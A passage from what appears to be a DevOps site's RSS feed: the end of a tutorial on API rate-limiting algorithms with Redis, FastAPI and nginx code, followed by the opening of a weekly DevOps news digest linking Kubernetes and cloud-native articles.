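    def stored_entries(self, client):
        # memory cost: grows with the request rate, not with the client count
        return len(self.log[client])


def boundary_burst(limit=100, before=59.5, after=60.2, spacing=0.001):
    """Constructed traffic: `limit` requests just before the minute boundary,
    then `limit` more just after it."""
    first = [before + i * spacing for i in range(limit)]
    second = [after + i * spacing for i in range(limit)]
    return first + second


def replay(limiter, timestamps, client="key-A"):
    """Return how many of the requests the limiter let through."""
    return sum(1 for t in timestamps if limiter.allow(client, t))


if __name__ == "__main__":
    burst = boundary_burst()
    log = SlidingWindowLog(limit=100, window=60)
    print("fixed window allowed:", replay(FixedWindow(100, 60), burst))
    print("sliding log allowed: ", replay(log, burst))
    print("timestamps held:     ", log.stored_entries("key-A"))
```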
<h3 id="h3-sliding-window-counter" class="group relative scroll-mt-24">
        <a href="#h3-sliding-window-counter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sliding window counter
        </a>
        </h3><p>The practical middle ground. Keep a counter per fixed window, then estimate the rolling count by weighting the previous window by how much of it still overlaps the trailing period.</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> time

<span class="hljs-keyword">def</span> <span class="hljs-title function_">sliding_window</span>(<span class="hljs-params">redis, key, limit, window</span>):
    now = time.time()
    current = <span class="hljs-built_in">int</span>(now // window)
    previous = current - <span class="hljs-number">1</span>
    <span class="hljs-comment"># how far we are into the current window, as a fraction</span>
    elapsed = (now % window) / window

    cur_count = <span class="hljs-built_in">int</span>(redis.get(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{current}</span>&quot;</span>) <span class="hljs-keyword">or</span> <span class="hljs-number">0</span>)
    prev_count = <span class="hljs-built_in">int</span>(redis.get(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{previous}</span>&quot;</span>) <span class="hljs-keyword">or</span> <span class="hljs-number">0</span>)

    <span class="hljs-comment"># weighted estimate of requests in the trailing window</span>
    estimated = prev_count * (<span class="hljs-number">1</span> - elapsed) + cur_count
    <span class="hljs-keyword">if</span> estimated &gt;= limit:
        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>

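    <span class="hljs-comment"># the check above and this increment are separate round trips, so concurrent</span>
    <span class="hljs-comment"># requests can each pass the check and overshoot the limit slightly</span>
    pipe = redis.pipeline()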
    pipe.incr(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{current}</span>&quot;</span>)
    pipe.expire(<span class="hljs-string">f&quot;<span class="hljs-subst">{key}</span>:<span class="hljs-subst">{current}</span>&quot;</span>, window * <span class="hljs-number">2</span>)
    pipe.execute()
    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre><p>This gives you accuracy very close to a true sliding window at the cost of two integers per client. It smooths out the boundary burst because the previous window&#39;s count still pulls weight right after the rollover. This is a solid default if token bucket does not fit your mental model.</p>
<h3 id="h3-token-bucket" class="group relative scroll-mt-24">
        <a href="#h3-token-bucket" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Token bucket
        </a>
        </h3><p>Picture a bucket that holds tokens. Every request takes one token. Tokens refill at a steady rate up to a maximum capacity. If the bucket is empty, the request is rejected.</p>
<pre><code class="hljs language-text">        refill at 10 tokens/sec
                 |
                 v
        +------------------+
        |  tokens: 73/100  |   capacity = 100 (max burst)
        +------------------+
                 |
          1 token per request
                 v
            request allowed
</code></pre><p>The capacity controls how big a burst you allow; the refill rate controls the sustained throughput. A client that has been quiet can spend its full bucket at once (a burst), then is held to the refill rate. This matches how people actually use APIs, which is why most public APIs (Stripe, GitHub, AWS) use token bucket or a close variant.</p>
<p>The catch is that refill and spend have to be atomic, or two concurrent requests can both read the same token count and both spend it. Do it in a single Redis Lua script so the whole read-refill-spend cycle runs without interruption:</p>
<pre><code class="hljs language-lua"><span class="hljs-comment">-- token_bucket.lua</span>
<span class="hljs-comment">-- KEYS[1] = bucket key</span>
<span class="hljs-comment">-- ARGV[1] = capacity</span>
<span class="hljs-comment">-- ARGV[2] = refill rate (tokens per second)</span>
<span class="hljs-comment">-- ARGV[3] = current time (seconds, with fraction)</span>
<span class="hljs-comment">-- ARGV[4] = tokens requested (cost)</span>
<span class="hljs-keyword">local</span> capacity = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">1</span>])
<span class="hljs-keyword">local</span> refill_rate = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">2</span>])
<span class="hljs-keyword">local</span> now = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">3</span>])
<span class="hljs-keyword">local</span> requested = <span class="hljs-built_in">tonumber</span>(ARGV[<span class="hljs-number">4</span>])

<span class="hljs-keyword">local</span> bucket = redis.call(<span class="hljs-string">&#x27;HMGET&#x27;</span>, KEYS[<span class="hljs-number">1</span>], <span class="hljs-string">&#x27;tokens&#x27;</span>, <span class="hljs-string">&#x27;last&#x27;</span>)
<span class="hljs-keyword">local</span> tokens = <span class="hljs-built_in">tonumber</span>(bucket[<span class="hljs-number">1</span>])
<span class="hljs-keyword">local</span> last = <span class="hljs-built_in">tonumber</span>(bucket[<span class="hljs-number">2</span>])

<span class="hljs-keyword">if</span> tokens == <span class="hljs-literal">nil</span> <span class="hljs-keyword">then</span>
  tokens = capacity
  last = now
<span class="hljs-keyword">end</span>

<span class="hljs-comment">-- refill based on time elapsed since the last request</span>
<span class="hljs-keyword">local</span> elapsed = <span class="hljs-built_in">math</span>.<span class="hljs-built_in">max</span>(<span class="hljs-number">0</span>, now - last)
tokens = <span class="hljs-built_in">math</span>.<span class="hljs-built_in">min</span>(capacity, tokens + elapsed * refill_rate)

<span class="hljs-keyword">local</span> allowed = <span class="hljs-number">0</span>
<span class="hljs-keyword">if</span> tokens &gt;= requested <span class="hljs-keyword">then</span>
  tokens = tokens - requested
  allowed = <span class="hljs-number">1</span>
<span class="hljs-keyword">end</span>

redis.call(<span class="hljs-string">&#x27;HMSET&#x27;</span>, KEYS[<span class="hljs-number">1</span>], <span class="hljs-string">&#x27;tokens&#x27;</span>, tokens, <span class="hljs-string">&#x27;last&#x27;</span>, now)
<span class="hljs-comment">-- expire idle buckets so Redis does not fill up with stale keys</span>
redis.call(<span class="hljs-string">&#x27;EXPIRE&#x27;</span>, KEYS[<span class="hljs-number">1</span>], <span class="hljs-built_in">math</span>.<span class="hljs-built_in">ceil</span>(capacity / refill_rate) * <span class="hljs-number">2</span>)

<span class="hljs-keyword">return</span> { allowed, tokens }
</code></pre><p>Load it once and call it per request:</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> time
<span class="hljs-keyword">import</span> redis

r = redis.Redis(host=<span class="hljs-string">&quot;localhost&quot;</span>, port=<span class="hljs-number">6379</span>, decode_responses=<span class="hljs-literal">True</span>)

<span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;token_bucket.lua&quot;</span>) <span class="hljs-keyword">as</span> f:
    take_token = r.register_script(f.read())

<span class="hljs-keyword">def</span> <span class="hljs-title function_">allow</span>(<span class="hljs-params">key, capacity=<span class="hljs-number">100</span>, refill_rate=<span class="hljs-number">10</span>, cost=<span class="hljs-number">1</span></span>):
    allowed, remaining = take_token(
        keys=[key],
        args=[capacity, refill_rate, time.time(), cost],
    )
    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bool</span>(allowed), <span class="hljs-built_in">int</span>(remaining)
</code></pre><h3 id="h3-leaky-bucket" class="group relative scroll-mt-24">
        <a href="#h3-leaky-bucket" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Leaky bucket
        </a>
        </h3><p>A leaky bucket is a queue that drains at a constant rate. Requests pour in (possibly in bursts), sit in the queue, and leave at a fixed pace. If the queue is full, new requests are dropped.</p>
<pre><code class="hljs language-text">   bursty requests in
        | | |  |
        v v v  v
     +-----------+
     |  queue    |   drops when full
     +-----------+
           |
      constant drain (e.g. 10 req/sec)
           v
      to downstream
</code></pre><p>The difference from token bucket matters. Token bucket allows a burst to pass through immediately as long as it has tokens. Leaky bucket never lets the output exceed the drain rate, no matter what. Use leaky bucket when the thing behind your API can only handle a steady throughput, for example a legacy system or a third-party API with a hard ceiling. If you want to allow bursts, use token bucket instead.</p>
<h2 id="h2-which-one-should-you-use" class="group relative scroll-mt-24">
        <a href="#h2-which-one-should-you-use" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Which one should you use?
        </a>
        </h2><table>
<thead>
<tr>
<th>Algorithm</th>
<th>Allows bursts</th>
<th>Memory per client</th>
<th>Accuracy</th>
<th>Use when</th>
</tr>
</thead>
<tbody><tr>
<td>Fixed window</td>
<td>At the boundary (bad)</td>
<td>1 integer</td>
<td>Low</td>
<td>Rough internal limits</td>
</tr>
<tr>
<td>Sliding window log</td>
<td>No</td>
<td>1 entry per request</td>
<td>Exact</td>
<td>Low-volume, precise rules</td>
</tr>
<tr>
<td>Sliding window counter</td>
<td>Smoothed</td>
<td>2 integers</td>
<td>High</td>
<td>General-purpose default</td>
</tr>
<tr>
<td>Token bucket</td>
<td>Yes, up to capacity</td>
<td>small hash</td>
<td>High</td>
<td>Public APIs, most cases</td>
</tr>
<tr>
<td>Leaky bucket</td>
<td>No</td>
<td>queue</td>
<td>High</td>
<td>Protecting a fixed-rate downstream</td>
</tr>
</tbody></table>
<p>If you are not sure, use <strong>token bucket</strong>. It handles real traffic well, the burst behavior is intuitive, and the Redis implementation above is production-ready. Reach for the sliding window counter if &quot;X requests per minute&quot; is easier to explain to your customers than a bucket.</p>
<h2 id="h2-wiring-it-into-your-api" class="group relative scroll-mt-24">
        <a href="#h2-wiring-it-into-your-api" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wiring it into your API
        </a>
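        </h2><p>Here is the token bucket as FastAPI middleware. It keys off the <code>x-api-key</code> header and falls back to the client IP when the header is absent. In production, key off the API key or authenticated user ID so a shared NAT does not punish everyone behind it, and validate the key before using it as the bucket key: a header value the server has not checked can be changed on every request, which gives the caller a fresh bucket each time.</p>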
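<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> redis
<span class="hljs-keyword">from</span> fastapi <span class="hljs-keyword">import</span> FastAPI, Request
<span class="hljs-keyword">from</span> fastapi.responses <span class="hljs-keyword">import</span> JSONResponse

<span class="hljs-comment"># allow() is the token bucket helper defined in the earlier snippet</span>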

app = FastAPI()

<span class="hljs-meta">@app.middleware(<span class="hljs-params"><span class="hljs-string">&quot;http&quot;</span></span>)</span>
<span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">rate_limit</span>(<span class="hljs-params">request: Request, call_next</span>):
    client_key = request.headers.get(<span class="hljs-string">&quot;x-api-key&quot;</span>) <span class="hljs-keyword">or</span> request.client.host
    key = <span class="hljs-string">f&quot;rl:<span class="hljs-subst">{client_key}</span>&quot;</span>

    <span class="hljs-keyword">try</span>:
        allowed, remaining = allow(key, capacity=<span class="hljs-number">100</span>, refill_rate=<span class="hljs-number">10</span>)
    <span class="hljs-keyword">except</span> redis.RedisError:
        <span class="hljs-comment"># fail open: if Redis is down, let traffic through rather than</span>
        <span class="hljs-comment"># taking the whole API offline. See the note below.</span>
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">await</span> call_next(request)

    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> allowed:
        <span class="hljs-keyword">return</span> JSONResponse(
            status_code=<span class="hljs-number">429</span>,
            content={<span class="hljs-string">&quot;error&quot;</span>: <span class="hljs-string">&quot;rate limit exceeded&quot;</span>, <span class="hljs-string">&quot;retry_after&quot;</span>: <span class="hljs-number">1</span>},
            headers={
                <span class="hljs-string">&quot;Retry-After&quot;</span>: <span class="hljs-string">&quot;1&quot;</span>,
                <span class="hljs-string">&quot;X-RateLimit-Limit&quot;</span>: <span class="hljs-string">&quot;100&quot;</span>,
                <span class="hljs-string">&quot;X-RateLimit-Remaining&quot;</span>: <span class="hljs-string">&quot;0&quot;</span>,
            },
        )

    response = <span class="hljs-keyword">await</span> call_next(request)
    response.headers[<span class="hljs-string">&quot;X-RateLimit-Limit&quot;</span>] = <span class="hljs-string">&quot;100&quot;</span>
    response.headers[<span class="hljs-string">&quot;X-RateLimit-Remaining&quot;</span>] = <span class="hljs-built_in">str</span>(remaining)
    <span class="hljs-keyword">return</span> response
</code></pre><p>Send back the standard headers. Clients use <code>X-RateLimit-Remaining</code> to slow themselves down before they hit the wall, and <code>Retry-After</code> tells a well-behaved client exactly how long to wait. Skipping these turns every client into a blind retry machine, which is the opposite of what you want.</p>
<h3 id="h3-fail-open-or-fail-closed" class="group relative scroll-mt-24">
        <a href="#h3-fail-open-or-fail-closed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fail open or fail closed?
        </a>
        </h3><p>When Redis is unreachable, you have two choices and you must pick deliberately:</p>
<ul>
<li><strong>Fail open</strong> (allow the request): the right default for general traffic. A Redis blip should not take your whole API down. The example above does this.</li>
<li><strong>Fail closed</strong> (reject the request): the right call for login, password reset, and payment endpoints, where letting traffic through unmetered is worse than a brief outage.</li>
</ul>
<p>Do not leave this to chance. An unhandled Redis exception that bubbles up as a 500 is the worst of both worlds.</p>
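<p>An added example, not code from the original post: one way to write the fail-open or fail-closed choice into code per endpoint group. The route prefixes, the 503 response with its <code>Retry-After</code> value, and the in-memory store standing in for Redis are assumptions made for illustration.</p>

```python
"""Per-route failure policy for a rate limiter (added example)."""
from dataclasses import dataclass, field


class BackendUnavailable(Exception):
    """Stands in for redis.RedisError so the example runs offline."""


@dataclass
class InMemoryBucketStore:
    """Token bucket keeping the same tokens/last state as the Redis hash.

    Assumption: this is a stand-in for the Lua script, not a copy of it.
    Set `down = True` to simulate an unreachable backend.
    """
    down: bool = False
    state: dict = field(default_factory=dict)

    def take(self, key, capacity, refill_rate, now, cost=1):
        if self.down:
            raise BackendUnavailable("store unreachable")
        tokens, last = self.state.get(key, (capacity, now))
        # Refill for the elapsed time, never above capacity.
        tokens = min(capacity, tokens + max(0.0, now - last) * refill_rate)
        allowed = tokens >= cost
        if allowed:
            tokens -= cost
        self.state[key] = (tokens, now)
        return allowed, int(tokens)


# Hypothetical route prefixes for the endpoint groups the text names
# (login, password reset, payments). Everything else fails open.
FAIL_CLOSED_PREFIXES = ("/auth/login", "/auth/password-reset", "/payments/")


def fails_closed(path):
    return path.startswith(FAIL_CLOSED_PREFIXES)


@dataclass
class Decision:
    status: int    # 200 forward, 429 limited, 503 limiter down on a fail-closed route
    reason: str    # log this field so unmetered traffic is visible during an outage
    headers: dict


def decide(store, path, client_key, now, capacity=100, refill_rate=10):
    """Return what the middleware should do for one request."""
    try:
        allowed, remaining = store.take(
            f"rl:{client_key}", capacity, refill_rate, now
        )
    except BackendUnavailable:
        if fails_closed(path):
            # Deliberate rejection instead of an unhandled 500.
            # Status 503 and the 5 second hint are choices made for this example.
            return Decision(503, "limiter_unavailable_fail_closed",
                            {"Retry-After": "5"})
        return Decision(200, "limiter_unavailable_fail_open", {})

    headers = {
        "X-RateLimit-Limit": str(capacity),
        "X-RateLimit-Remaining": str(remaining),
    }
    if not allowed:
        headers["Retry-After"] = "1"
        return Decision(429, "rate_limited", headers)
    return Decision(200, "ok", headers)


if __name__ == "__main__":
    store = InMemoryBucketStore()
    # Constructed requests: healthy store first, then a simulated outage.
    for path in ("/api/data", "/auth/login"):
        print(path, decide(store, path, "demo-key", now=1000.0))
    store.down = True
    for path in ("/api/data", "/auth/login", "/payments/charge"):
        print(path, decide(store, path, "demo-key", now=1001.0))
```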
<h2 id="h2-do-it-at-the-edge-when-you-can" class="group relative scroll-mt-24">
        <a href="#h2-do-it-at-the-edge-when-you-can" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Do it at the edge when you can
        </a>
        </h2><p>If all you need is a flat limit per IP, do not write code at all. Put it in nginx in front of your service:</p>
<pre><code class="hljs language-nginx"><span class="hljs-comment"># define a shared memory zone keyed by client IP, 10 req/sec</span>
<span class="hljs-attribute">limit_req_zone</span> <span class="hljs-variable">$binary_remote_addr</span> zone=api:<span class="hljs-number">10m</span> rate=10r/s;

<span class="hljs-section">server</span> {
    <span class="hljs-section">location</span> /api/ {
        <span class="hljs-comment"># allow short bursts of 20, no artificial delay on them</span>
        <span class="hljs-attribute">limit_req</span> zone=api burst=<span class="hljs-number">20</span> nodelay;
        <span class="hljs-attribute">limit_req_status</span> <span class="hljs-number">429</span>;
        <span class="hljs-attribute">proxy_pass</span> http://backend;
    }
}
</code></pre><p>nginx&#39;s <code>limit_req</code> is a leaky bucket under the hood. This stops abusive traffic before it ever reaches your application, which is exactly where you want to drop it. Use the application-level Redis approach when you need per-user limits, different tiers, or limits that depend on the request body. Use both together for defense in depth.</p>
<h2 id="h2-seeing-it-work" class="group relative scroll-mt-24">
        <a href="#h2-seeing-it-work" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Seeing it work
        </a>
        </h2><p>Fire a quick loop at the endpoint and watch the limit kick in:</p>
<pre><code class="hljs language-text">$ for i in $(seq 1 12); do \
    curl -s -o /dev/null -w &quot;%{http_code} &quot; http://localhost:8000/api/data; \
  done
200 200 200 200 200 200 200 200 200 200 429 429
</code></pre><p>The full response on a rejected request:</p>
<pre><code class="hljs language-text">$ curl -i http://localhost:8000/api/data
HTTP/1.1 429 Too Many Requests
content-type: application/json
retry-after: 1
x-ratelimit-limit: 100
x-ratelimit-remaining: 0

{&quot;error&quot;:&quot;rate limit exceeded&quot;,&quot;retry_after&quot;:1}
</code></pre><p>And the bucket state itself, straight from Redis:</p>
<pre><code class="hljs language-text">$ redis-cli HGETALL rl:203.0.113.45
1) &quot;tokens&quot;
2) &quot;0&quot;
3) &quot;last&quot;
4) &quot;1717840800.123&quot;
</code></pre><p>Tokens at zero, last access timestamped. Wait a second and the Lua script refills 10 tokens on the next request.</p>
<h2 id="h2-next-steps" class="group relative scroll-mt-24">
        <a href="#h2-next-steps" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Next steps
        </a>
        </h2><ul>
<li>Add the token bucket Lua script and FastAPI middleware to one endpoint, key it off the API key, and load test it with <code>hey -z 30s -c 50 http://localhost:8000/api/data</code> to confirm the 429s show up where you expect.</li>
<li>Set your <code>capacity</code> and <code>refill_rate</code> from real traffic, not guesses. Pull your p99 requests-per-second per client from logs and set the sustained rate a bit above that, with capacity for a 5 to 10 second burst.</li>
<li>Pick fail-open or fail-closed per endpoint group and write it into the code, not a wiki page.</li>
<li>Add <code>X-RateLimit-*</code> headers to every response and document them so client teams can back off gracefully.</li>
<li>Put a flat per-IP <code>limit_req</code> in nginx as a cheap outer wall, even if you already limit per user in the app.</li>
<li>Alert on your 429 rate. A sudden spike means either an abusive client or a limit set too low for legitimate traffic, and you want to know which before the support tickets arrive.</li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 24, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-24</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 08 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-24</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        </h2><h3 id="h3-benchmarking-kubevirt-performance-with-virtbench" class="group relative scroll-mt-24">
        <a href="#h3-benchmarking-kubevirt-performance-with-virtbench" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Benchmarking KubeVirt performance with virtbench
        </a>
        </h3><p>Organizations migrating VM estates from traditional hypervisors to KubeVirt often discover that many Kubernetes observability tools were originally designed around container workloads rather than VM-c</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/08/benchmarking-kubevirt-performance-with-virtbench/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-the-future-how-garanti-bbva-manages-etcd-in-massive-red-hat-openshift-environments" class="group relative scroll-mt-24">
        <a href="#h3-scaling-the-future-how-garanti-bbva-manages-etcd-in-massive-red-hat-openshift-environments" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling the future: How Garanti BBVA manages etcd in massive Red Hat OpenShift environments
        </a>
        </h3><p>At the OpenShift Commons Gathering in Amsterdam on March 23—a Day Zero event for KubeCon + CloudNativeCon Europe 2026—attendees got a deep look into the engine room of 1 of Turkey&#39;s largest private ba</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/scaling-future-how-garanti-bbva-manages-etcd-massive-red-hat-openshift-environments"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-path-to-autonomous-intelligent-networks" class="group relative scroll-mt-24">
        <a href="#h3-the-path-to-autonomous-intelligent-networks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The path to autonomous intelligent networks
        </a>
        </h3><p>Telecommunications (telco) service providers face a landscape of massive operational complexity. As they adopt 5G standalone architectures and multivendor radio access networks (RANs), they must manag</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/path-autonomous-intelligent-networks"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-an-eks-environment-factory-with-pulumi-and-vcluster" class="group relative scroll-mt-24">
        <a href="#h3-build-an-eks-environment-factory-with-pulumi-and-vcluster" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build an EKS Environment Factory with Pulumi and vCluster
        </a>
        </h3><p>AWS reports in an AWS Architecture Blog case study that Deloitte’s move to a virtual cluster model on Amazon EKS resulted in 89% faster testing environment provisioning. By consolidating dozens of dis</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/eks-vcluster-ephemeral-environments-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster" class="group relative scroll-mt-24">
        <a href="#h3-field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Field Notes: Using the Harvester CSI Driver to consume Longhorn storage in your guest cluster
        </a>
        </h3><p>When running a guest Kubernetes cluster inside SUSE Virtualization/Harvester, you get the best of both worlds: bare-metal performance with VM-level flexibility. It’s a really common pattern: you insta</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-openshift-virtualization-421-removing-complexity-from-your-virtual-machine-networking-workflow" class="group relative scroll-mt-24">
        <a href="#h3-openshift-virtualization-421-removing-complexity-from-your-virtual-machine-networking-workflow" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenShift Virtualization 4.21: Removing complexity from your virtual machine networking workflow
        </a>
        </h3><p>Red Hat OpenShift Virtualization 4.21 introduces highly anticipated networking design flows to simplify network management. Tailored to VM network requirements, this complete workflow lets you more ef</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/openshift-virtualization-421-removing-complexity-your-virtual-machine-networking-workflow"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-kubernetes-dashboard-to-headlamp-understanding-the-transition" class="group relative scroll-mt-24">
        <a href="#h3-from-kubernetes-dashboard-to-headlamp-understanding-the-transition" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Kubernetes Dashboard to Headlamp: Understanding the Transition
        </a>
        </h3><p>For many people, Kubernetes Dashboard was their first window into Kubernetes. It offered a simple visual way to see what was running in a cluster, inspect resources, and build confidence without relyi</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/01/dashboard-to-headlamp/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms" class="group relative scroll-mt-24">
        <a href="#h3-breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Breaking free of a single datacenter: Practical geo-distributed AI operations with the k0smos platforms
        </a>
        </h3><p>Breaking the single datacenter assumption Modern AI architectures are built on the assumption of centralized, homogeneous data centers. In reality, infrastructure is messy. For most organizations, com</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/08/breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ecs-with-aws-fargate-now-supports-32vcpu-compute-configurations" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ecs-with-aws-fargate-now-supports-32vcpu-compute-configurations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon ECS with AWS Fargate now supports 32vCPU compute configurations
        </a>
        </h3><p>Amazon Elastic Container Service (Amazon ECS) with AWS Fargate now supports 32vCPU compute configurations, enabling customers to run more demanding applications with greater flexibility and performanc</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ecs-fargate-32vcpu"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-identity-and-access-management-whitepaper" class="group relative scroll-mt-24">
        <a href="#h3-identity-and-access-management-whitepaper" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Identity and Access Management Whitepaper
        </a>
        </h3><p>As cloud native architectures become more distributed, dynamic, and automated, identity increasingly becomes the new security perimeter. Traditional approaches to authentication and authorization stru</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/04/identity-and-access-management-whitepaper/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-hardened-images-explained-fewer-cves-smaller-attack-surface" class="group relative scroll-mt-24">
        <a href="#h3-hardened-images-explained-fewer-cves-smaller-attack-surface" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Hardened Images Explained: Fewer CVEs, Smaller Attack Surface
        </a>
        </h3><p>When security teams scan their container environments for the first time, they often discover hundreds of known vulnerabilities, and almost none of them trace back to application code. The overwhelmin</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-are-hardened-images/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-yugandhar-suthari" class="group relative scroll-mt-24">
        <a href="#h3-yugandhar-suthari" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Yugandhar Suthari
        </a>
        </h3><p>CNCF Kyverno maintainer, KubeCon Europe 2026 Program Committee member, KyvernoCon 2025–2026 program committee and speaker, Golden Kubestronaut</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 KubeCon Updates</strong></p>
<p><a href="https://events.linuxfoundation.org/2026/06/03/yugandhar-suthari/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back" class="group relative scroll-mt-24">
        <a href="#h3-fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fragnesia and friends: When page cache vulnerabilities keep coming back
        </a>
        </h3><p>A couple of weeks ago, I wrote about Copy-Fail (CVE-2026-31431) and how Red Hat OpenShift’s defense-in-depth approach prevented container escape despite a vulnerable kernel. I spent time actively tryi</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
